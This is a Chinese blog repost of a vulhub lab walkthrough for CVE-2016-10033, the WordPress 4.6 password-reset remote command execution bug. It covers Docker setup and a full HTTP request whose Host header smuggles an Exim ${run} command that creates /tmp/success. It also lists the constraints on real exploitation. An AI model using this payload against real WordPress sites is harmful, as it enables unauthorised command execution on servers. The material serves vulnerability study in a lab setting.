栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 系统运维 > 运维 > Linux

vulhub漏洞复现74

Linux 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

vulhub漏洞复现74

CVE-2016-10033_Wordpress 4.6 任意命令执行漏洞(Pwnscriptum)

漏洞原理

参考 https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html

测试环境

靶场:192.168.4.10_ubuntu

编译及运行测试环境

#docker-compose build

#docker-compose up -d

由于Mysql初始化需要一段时间,所以请等待。成功运行后,访问`http://your-ip:8080/`打开站点,初始化管理员用户名和密码后即可使用(数据库等已经配置好,且不会自动更新)。

测试与EXP使用

发送如下数据包

```

POST /wp-login.php?action=lostpassword HTTP/1.1

Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)

Connection: close

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Accept: */*

Content-Length: 56

Content-Type: application/x-www-form-urlencoded

wp-submit=Get+New+Password&redirect_to=&user_login=root

```

 可见`/tmp/success`已经成功创建:

 

但实际利用起来,还是有一些坑需要踏过。具体的坑有这么几个:

1. 执行的命令不能包含大量特殊字符,如`:`、引号等。

2. 命令会被转换成小写字母

3. 命令需要使用绝对路径

4. 需要知道某一个存在的用户的用户名

漏洞利用

使用msf复现

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/733542.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号